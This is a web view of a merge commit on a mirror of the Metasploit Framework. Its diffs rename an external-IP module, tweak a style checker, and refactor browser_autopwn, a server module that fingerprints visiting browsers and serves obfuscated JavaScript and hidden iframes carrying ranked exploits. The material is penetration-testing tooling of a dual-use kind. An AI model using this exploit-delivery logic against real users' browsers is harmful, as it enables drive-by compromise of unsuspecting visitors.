infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/rapid7/metasploit-framework

bug/bundler_fix
jvazquez-r7 2013-03-21 09:07:41 +01:00
parent 189abdc650 011b6899b0
commit b30a5aa6e8
3 changed files with 74 additions and 85 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/auxiliary/gather/external_ip.rb
View File

@ -17,8 +17,13 @@ class Metasploit3 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'External IP', 'Name' => 'Discover External IP via Ifconfig.me',
'Description' => 'This module checks for the public source IP address of the current route to the RHOST', 'Description' => %q{
This module checks for the public source IP address of the current
route to the RHOST by querying the public web application at ifconfig.me.
It should be noted this module will register activity on ifconfig.me,
which is not affiliated with Metasploit.
},
'Author' => ['RageLtMan'], 'Author' => ['RageLtMan'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>

142
modules/auxiliary/server/browser_autopwn.rb
View File

@ -385,8 +385,8 @@ class Metasploit3 < Msf::Auxiliary
def start_exploit_modules() def start_exploit_modules()
@lhost = (datastore['LHOST'] || "0.0.0.0") @lhost = (datastore['LHOST'] || "0.0.0.0")
@js_tests = {}
@noscript_tests = {} @noscript_tests = {}
@all_tests = {}
print_line print_line
print_status("Starting exploit modules on host #{@lhost}...") print_status("Starting exploit modules on host #{@lhost}...")
@ -446,20 +446,24 @@ class Metasploit3 < Msf::Auxiliary
end end
# Now that we've got all of our exploit tests put together, # Now that we've got all of our exploit tests put together,
# organize them into requires-scripting and # organize them into an all tests (JS and no-JS), organized by rank,
# doesnt-require-scripting, sorted by browser name. # and doesnt-require-scripting (no-JS), organized by browser name.
if apo[:javascript] && apo[:ua_name] if apo[:javascript] && apo[:ua_name]
@js_tests[apo[:ua_name]] ||= [] @all_tests[apo[:rank]] ||= []
@js_tests[apo[:ua_name]].push(apo) @all_tests[apo[:rank]].push(apo)
elsif apo[:javascript] elsif apo[:javascript]
@js_tests["generic"] ||= [] @all_tests[apo[:rank]] ||= []
@js_tests["generic"].push(apo) @all_tests[apo[:rank]].push(apo)
elsif apo[:ua_name] elsif apo[:ua_name]
@noscript_tests[apo[:ua_name]] ||= [] @noscript_tests[apo[:ua_name]] ||= []
@noscript_tests[apo[:ua_name]].push(apo) @noscript_tests[apo[:ua_name]].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
else else
@noscript_tests["generic"] ||= [] @noscript_tests["generic"] ||= []
@noscript_tests["generic"].push(apo) @noscript_tests["generic"].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
end end
end end
@ -501,9 +505,8 @@ class Metasploit3 < Msf::Auxiliary
print_line print_line
# Sort the tests by reliability, descending. # Sort the tests by reliability, descending.
@js_tests.each { |browser,tests| # I don't like doing this directly (wihout a !), but any other sort wasn't sticking - NE
tests.sort! {|a,b| b[:rank] <=> a[:rank]} @all_tests = @all_tests.sort.reverse
}
# This matters a lot less for noscript exploits since they basically # This matters a lot less for noscript exploits since they basically
# get thrown into a big pile of iframes that the browser will load # get thrown into a big pile of iframes that the browser will load
@ -511,7 +514,6 @@ class Metasploit3 < Msf::Auxiliary
@noscript_tests.each { |browser,tests| @noscript_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]} tests.sort! {|a,b| b[:rank] <=> a[:rank]}
} }
end end
# #
@ -746,83 +748,66 @@ class Metasploit3 < Msf::Auxiliary
# if we have no client_info, this will add all tests. Otherwise tries # if we have no client_info, this will add all tests. Otherwise tries
# to only send tests for exploits that target the client's detected # to only send tests for exploits that target the client's detected
# browser. # browser.
@js_tests.each { |browser, sploits|
next unless client_matches_browser(client_info, browser)
# Send all the generics regardless of what the client is. If the @all_tests.each { |rank, sploits|
# client is nil, then we don't know what it really is, so just err sploits.each { |s|
# on the side of shells and send everything. Otherwise, send only browser = s[:ua_name] || "generic"
# if the client is using the browser associated with this set of next unless client_matches_browser(client_info, browser)
# exploits.
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
sploits.each do |s|
if s[:vuln_test].nil? or s[:vuln_test].empty?
test = "is_vuln = true"
else
# get rid of newlines and escape quotes
test = s[:vuln_test].gsub("\n",'').gsub("'", "\\\\'")
end
# shouldn't be any in the resource, but just in case...
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
# Skip exploits that don't match the client's OS. # Send all the generics regardless of what the client is. If the
if (host_info and host_info[:os_name] and s[:os_name]) # client is nil, then we don't know what it really is, so just err
# Reject exploits whose OS doesn't match that of the # on the side of shells and send everything. Otherwise, send only
# victim. Note that host_info comes from javascript OS # if the client is using the browser associated with this set of
# detection, NOT the database. # exploits.
if host_info[:os_name] != "undefined" if s[:javascript]
unless s[:os_name].include?(host_info[:os_name]) if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
vprint_status("Rejecting #{s[:name]} for non-matching OS") if s[:vuln_test].nil? or s[:vuln_test].empty?
next test = "is_vuln = true"
else
# get rid of newlines and escape quotes
test = s[:vuln_test].gsub("\n",'').gsub("'", "\\\\'")
end
# shouldn't be any in the resource, but just in case...
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
# Skip exploits that don't match the client's OS.
if (host_info and host_info[:os_name] and s[:os_name])
# Reject exploits whose OS doesn't match that of the
# victim. Note that host_info comes from javascript OS
# detection, NOT the database.
if host_info[:os_name] != "undefined"
unless s[:os_name].include?(host_info[:os_name])
vprint_status("Rejecting #{s[:name]} for non-matching OS")
next
end
end end
end end
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'#{test}',\n"
js << " 'resource':'#{res}'\n"
js << "};\n"
sploits_for_this_client.push s[:name]
sploit_cnt += 1
end
else
if s[:name] =~ %r|/java_|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'is_vuln = navigator.javaEnabled()',\n"
js << " 'resource':'#{res}'\n"
js << "};\n"
else
# Some other kind of exploit that we can't generically
# check for in javascript, throw it on the pile.
noscript_html << html_for_exploit(s, client_info)
end end
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'#{test}',\n"
js << " 'resource':'#{res}'\n"
js << "};\n"
sploits_for_this_client.push s[:name] sploits_for_this_client.push s[:name]
sploit_cnt += 1 sploit_cnt += 1
end end
end }
} }
# Add a javaEnabled() test specifically for java exploits. Other
# exploits that don't require javascript go into a big pile of iframes
# that will be dumped out after other exploitation is done, assuming
# the browser didn't stop somewhere along the way due to a successful
# exploit or a crash from all the memory raping we just did.
noscript_html = ""
@noscript_tests.each { |browser, sploits|
sploits.each do |s|
if s[:name] =~ %r|/java_|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'is_vuln = navigator.javaEnabled()',\n"
js << " 'resource':'#{res}'\n"
js << "};\n"
else
# Some other kind of exploit that we can't generically
# check for in javascript, throw it on the pile.
noscript_html << html_for_exploit(s, client_info)
end
sploits_for_this_client.push s[:name]
sploit_cnt += 1
end
}
# If all of our exploits that require javascript fail, try to continue
# with those that don't
js << %Q|var noscript_exploits = "|
js << Rex::Text.to_hex(noscript_html, "%")
js << %Q|";\n|
js << %Q|var noscript_div = document.createElement("div");\n|
# Have to use innerHTML here to render the new iframes. Using
# document.createElement and appendChild() will escape all the
# entities.
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
js << %Q|document.body.appendChild(noscript_div);\n|
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n" js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
js << "window.next_exploit(0);\n" js << "window.next_exploit(0);\n"
@ -830,7 +815,6 @@ class Metasploit3 < Msf::Auxiliary
js.obfuscate unless datastore["DEBUG"] js.obfuscate unless datastore["DEBUG"]
response.body = "#{js}" response.body = "#{js}"
print_status("Responding with #{sploit_cnt} exploits") print_status("Responding with #{sploit_cnt} exploits")
sploits_for_this_client.each do |name| sploits_for_this_client.each do |name|
vprint_status("* #{name}") vprint_status("* #{name}")

2
tools/msftidy.rb
View File

@ -277,7 +277,7 @@ class Msftidy
if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/ if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/
words = $1.split words = $1.split
words.each do |word| words.each do |word|
if %w{and or the for to in of as with a an on at}.include?(word) if %w{and or the for to in of as with a an on at via}.include?(word)
next next
elsif %w{pbot}.include?(word) elsif %w{pbot}.include?(word)
elsif word =~ /^[a-z]+$/ elsif word =~ /^[a-z]+$/